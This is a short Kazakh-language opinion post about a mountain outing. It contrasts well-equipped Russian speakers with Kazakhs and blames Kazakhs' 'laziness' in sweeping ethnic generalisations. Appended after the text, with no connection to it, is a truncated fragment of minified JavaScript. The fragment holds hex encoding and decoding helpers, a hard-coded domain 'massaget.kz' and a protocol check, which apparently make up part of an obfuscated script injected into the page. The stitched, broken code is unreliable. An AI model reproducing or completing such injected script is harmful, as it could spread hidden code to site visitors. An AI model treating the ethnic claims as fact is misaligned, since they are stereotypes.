Тауға шығып бара жатып жолда сан түрлі адамдарды жолықтырамыз, бірі көтеріліп бара жатады, бірі төменге түсіп келе жатады, ал бірі тіпті демалып отырады. Азды-көпті мыңдаған адамды кезіктіресің, осы жолы біз 60 шақты қаракөз басымыз бірігіп шықтық, келесі жолы 100-ден ассақ деген ниет бар. Бұлай деуімнің себебі − тауда сайран салып жүргеннің көбі орысша шүлдірлеген өзге ұлт өкілдері.
Ішендегі орекеңдердің жөні бөлекқой, О-О-О, қалай демалу керек екенін ол кісілерден артық білетін жоқ шығар. Құрал-сайман түгел енді, сноуборд дейсің ба, шаңғы дейсің ба, тіпті киімдері де тауға арналып тігілген, қарасаң әуесің кетеді. Қарап тұрып еріксіз "Біздің қай жеріміз кем" деген ой келеді.
Көбінің жауабы дайын: "Ақшалары көп, не істерлерін, қайда жаратарларын білмей жүр да" деген. Оларға ақша аспаннан жаумаған шығар, орекеңдер білім алуға уйреніп, оқуға "жадный" екенін мойындауымыз керек қой. Білімдерінің арқасында шаруаны дөңгелетіп, ақшаны күрейтініне де үндемей келісетін шығарсыздар.)
Біз қазекеңдерді біреу қуып жатқандай қашамыз білімнен, сосын үйде жатып алып, тілімізді Ресейге қарай шұбыртамыз. Ол жәй ғана - ЖАЛҚАУЛЫҚ бізді жеңіп алған. Осы дертті жеңсек, бізден асқан білімді, дәулеті кең, байлығы асқан адам болмайды.
Көзімізді ашайық, Оянайық, ҚАЗАҚТАР!
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e